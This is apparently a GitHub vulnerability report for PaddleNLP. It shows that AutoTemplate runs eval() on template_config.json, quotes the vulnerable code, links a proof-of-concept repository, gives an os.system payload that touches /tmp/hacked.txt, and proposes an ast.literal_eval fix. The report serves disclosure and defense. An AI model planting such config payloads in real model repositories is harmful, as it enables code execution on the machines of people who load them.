[Bug]: Potential code execution when handling untrusted template_config.json via AutoTemplate #11212

@Vancir

Description

Software Environment

paddle2onnx                 2.1.0
paddlefsl                   1.1.0
paddlenlp                   2.8.1
paddlepaddle                3.3.0

Duplicate Check

  • I have searched the existing issues

Bug Description

The AutoTemplate component unsafely processes external template configuration files by evaluating their content using Python’s eval() function.

When a user runs a prompt-based text classification task, PaddleNLP reads template_config.json from the task path and passes its contents to Template.parse_template_string().

```python
def load_from(
    cls, data_path: os.PathLike, tokenizer: PretrainedTokenizer, max_length: int, model: PretrainedModel = None
):
    template_config_file = os.path.join(data_path, TEMPLATE_CONFIG_FILE)
    if not os.path.isfile(template_config_file):
        raise ValueError("{} not found under {}".format(TEMPLATE_CONFIG_FILE, data_path))
    with open(template_config_file, "r", encoding="utf-8") as fp:
        config = [x.strip() for x in fp]
    prompt = json.loads(config[0])
    if len(config) > 1:
        template_class = json.loads(config[1])["class"]
    else:
        template_class = None  # Compatible with previous versions
    template = cls.create_from(
        prompt=prompt, tokenizer=tokenizer, max_length=max_length, model=model, template_class=template_class
    )
```

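For context, load_from() implies a two-line file format: line 1 holds the JSON-encoded prompt string, and an optional line 2 holds a {"class": ...} record. A minimal sketch of writing and re-reading such a file with the same parsing steps (the prompt string and class name below are illustrative, not taken from the PoC):

```python
import json
import os
import tempfile

TEMPLATE_CONFIG_FILE = "template_config.json"
data_path = tempfile.mkdtemp()
config_path = os.path.join(data_path, TEMPLATE_CONFIG_FILE)

# Write a benign two-line config: prompt string, then template class record.
with open(config_path, "w", encoding="utf-8") as fp:
    fp.write(json.dumps("{'text': 'text_a'}{'mask'}") + "\n")
    fp.write(json.dumps({"class": "ManualTemplate"}) + "\n")

# Re-read it using the same steps as load_from() above.
with open(config_path, "r", encoding="utf-8") as fp:
    config = [x.strip() for x in fp]
prompt = json.loads(config[0])
template_class = json.loads(config[1])["class"] if len(config) > 1 else None
print(prompt, template_class)
```

Nothing in this path validates the prompt string itself; it flows unmodified into the template parser.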
Inside parse_template_string(), substrings wrapped in {} are evaluated directly as Python code using eval():

```python
# Parse blocks with paired tokens like "{ }".
if prompt[index] == left_token:
    left_index = index
    while index < len(prompt):
        if prompt[index] == left_token:
            left_stack.append(index)
        elif prompt[index] == right_token:
            left_stack.pop()
            if len(left_stack) == 0:
                break
        index += 1
    if index == len(prompt) and len(left_stack) > 0:
        raise ValueError(
            "{} at position {} has no corresponding {}".format(left_token, left_index, right_token)
        )
    try:
        part_dict = eval(prompt[left_index : index + 1])
```

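The hazard can be shown in miniature with a standalone sketch (not PaddleNLP code): eval() executes any expression embedded in the braces, not just the dict literals the parser expects.

```python
# A legitimate template part is a plain dict literal, and eval() parses it:
part = "{'text': 'text_a'}"
benign = eval(part)  # -> {'text': 'text_a'}

# But eval() equally runs arbitrary expressions with side effects. The
# harmless __import__ call below stands in for os.system(...) in the PoC:
malicious = "{'text': __import__('sys').platform}"
result = eval(malicious)  # the import executes -- this is code execution
print(benign, result)
```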
An attacker can publish a model repository containing a crafted template_config.json with embedded Python expressions. When a victim loads the model through standard PaddleNLP APIs (e.g., Taskflow), the payload is evaluated and executed automatically.

This turns external template configuration files into attack vectors and creates a supply-chain security risk: because the payload hides in an auxiliary configuration file rather than in model weights, it evades scanners that only inspect weight files.

Steps to Reproduce & Code

I built a proof-of-concept repository for demonstration.

git clone https://huggingface.co/XManFromXlab/paddlenlp-AutoTemplate-RCE

The payload looks like this:

"{os.system('echo \"You have been hacked!!!\" && touch /tmp/hacked.txt')}"

Once victims run the following code:

from paddlenlp import Taskflow

Taskflow("text_classification", mode="prompt", task_path="./paddlenlp-AutoTemplate-RCE")

It prints the message You have been hacked!!! and creates an empty file /tmp/hacked.txt, demonstrating arbitrary command execution.
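A possible hardening, sketched below, is to parse {}-wrapped parts with ast.literal_eval instead of eval: literal dicts still parse, but any expression containing a call such as os.system is rejected. This is only an illustrative sketch, not an official PaddleNLP patch; parse_part and its checks are hypothetical.

```python
import ast

def parse_part(raw: str) -> dict:
    """Parse a {}-wrapped template part as a Python literal only (hypothetical fix)."""
    try:
        part = ast.literal_eval(raw)
    except (ValueError, SyntaxError) as exc:
        # literal_eval refuses anything that is not a pure literal,
        # including function calls like os.system(...).
        raise ValueError(f"Invalid template part (literals only): {raw!r}") from exc
    if not isinstance(part, dict):
        raise ValueError(f"Template part must be a dict: {raw!r}")
    return part

print(parse_part("{'text': 'text_a'}"))  # accepted: a plain dict literal
# parse_part("{os.system('touch /tmp/hacked.txt')}")  # raises ValueError
```

An allow-list of recognized part keys on top of this would further constrain what a repository-supplied template can express.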
